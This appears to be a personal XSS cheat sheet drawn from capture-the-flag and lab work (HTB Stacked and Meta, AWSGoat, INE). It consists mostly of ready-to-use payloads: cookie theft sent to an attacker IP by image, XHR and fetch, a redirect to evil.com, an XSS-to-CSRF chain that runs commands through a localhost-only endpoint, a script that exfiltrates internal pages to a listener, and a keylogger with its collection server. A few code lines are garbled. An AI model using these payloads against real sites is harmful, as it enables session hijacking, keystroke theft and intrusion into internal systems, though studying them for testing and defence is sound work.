Cookie Stealing-
(Note: HttpOnly should not be enabled/present in cookie header)
- Classic way-
<script>var i=new Image(); i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);</script>
Here we have used btoa() method for converting the cookie string into base64 encoded string.
python3 -m http.server -m 80
2. Bypassing secure flag protection-
a) Creating a HTTPS server-
openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes
Generating certificate.
#!/usr/bin/python3
import http.server, sslserver_address = ('0.0.0.0', 443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,server_side=True,certfile='localhost.pem')
"""ssl_version=ssl.PROTOCOL_TLSv1_2)
"""
httpd.serve_forever()
Starting web server.
2. Via XHR-
var xhr=new XMLHttpRequest();
xhr.open("GET", "https://10.10.14.8/?"+document.cookie, true);
xhr.send();
3. Fetch api
Redirecting User to malicious websites-
<script>window.location.replace("http://evil.com");</script>
Accessing internal application/Bypassing localhost restrictions-
Suppose Some functionality in web app which can be accessed only from local server. And if xss is getting triggered on serverside when a Administrator user is browsing vulnerable web app while logged in, then it is possible to access this internal functionality by combining XSS+CSRF by using a xhr request.
Scenario 1:
Sample source code:
if($_SERVER['REMOTE_ADDR'] == "::1")
{
system($_POST['cmd']);
} else
{
echo "It's only allowed to access this function from localhost (::1).<br> This is due to the recent hack attempts on our server.";
}
XHR request js file-
var http = new XMLHttpRequest();
var url = 'http://127.0.0.1/admin/backdoorchecker.php';
var params = 'orem=dir | ping -n 5 10.10.14.8';
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.withCredentials = true;
http.send(params);
<script src=http://10.10.14.8:80/robme.js></script>
Scenerio 2: Stacked.htb
Referer http header is vuln to xss.
Our XSS is being triggered at other application hosted on domain mail.stacked.htb which was not accessible from external network.
So for accessing that we will be using simple javascript as below in our xss payload:
//apni.js
var url="http://mail.stacked.htb/" //targeturl(internal wep application)
var xhr=new XMLHttpRequest();
xhr.open("GET", url, false);
xhr.send();
var resp=xhr.responseText;//transferring HTTP response to us
var xhr2=new XMLHttpRequest();
xhr2.open("POST", 'http://10.10.14.89:443/', false);
xhr2.send(resp);
XSS payload-
<script src="http://10.10.14.89/apni.js"></script>
And we start netcat listener for capturing response of our xhr.
We can open this html in browser to view the application.
Keylogger
This payload was used while solving AWSGOAT module 1.
<img src='a' onerror="
document.onkeypress = function(evt) {
evt = evt || window.event;
const key = String.fromCharCode(evt.charCode);
if (key) {
fetch('https://<YOUR-LISTENER-DOMAIN>/?key=' + encodeURIComponent(key), {method: 'GET', mode: 'no-cors'})
.catch(err => console.error('Error:', err));
}
};
alert('xss');
">
And we create a listener server as well:
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs, unquote
# Define the file to save keystrokes
LOG_FILE = "keystrokes.log"
class KeystrokeLoggerHandler(BaseHTTPRequestHandler):
def do_GET(self):
# Parse the incoming request URL
query_components = parse_qs(urlparse(self.path).query)
# Extract the 'key' parameter and decode it
key = query_components.get('key', [''])[0]
decoded_key = unquote(key)
# Log the decoded key to the console
print(f"Keystroke received: {decoded_key}")
# Save the keystroke to a file
with open(LOG_FILE, "a") as f:
f.write(decoded_key + "\n")
# Respond with a 200 OK
self.send_response(200)
self.end_headers()
# Start the server
server_address = ('', 8000) # Listen on port 1234
httpd = HTTPServer(server_address, KeystrokeLoggerHandler)
print(f"Keystroke logger server is running on port 1234 and logging to {LOG_FILE}...")
httpd.serve_forever()
Then i also used nginx to turn it into https.
DOM XSS
INE: WebApp Labs Web Application attacks LAB 30
window.onload = function() {var site=document.location.href;var index = site.indexOf("=", 0);name="";if(index != -1) {name=site.substr(index+1);}name=decodeURIComponent(name);document.getElementById('name').innerHTML=name;}
Payload:
<img src='lol' onerror="alert(1)">
XSS via file uploads:
Note: Below Scenario is there in meta htb machine.
exiftool -Comment='<H1>Hello</H1>' Untitled.png
Verified HTML injection.
For XSS we can try the below payload:
<img src=x onerror=alert(document.domain)>
HTML Injection:
<html>
<body>
<script>
function download File(URL, filename)
{
const anchorElement = document.createElement('a');
anchorElement.href = url;
anchorElement.download = filename;
document.body.appendChild(anchorElement);
anchorElement.click();
document.body.removeChild(anchorElement);
}
const fileUrl = '<URL for the file>';
const fileName = '<file name for saving on victim end>';
downloadFile(fileUrl, fileName);
</script>
</body>
</html>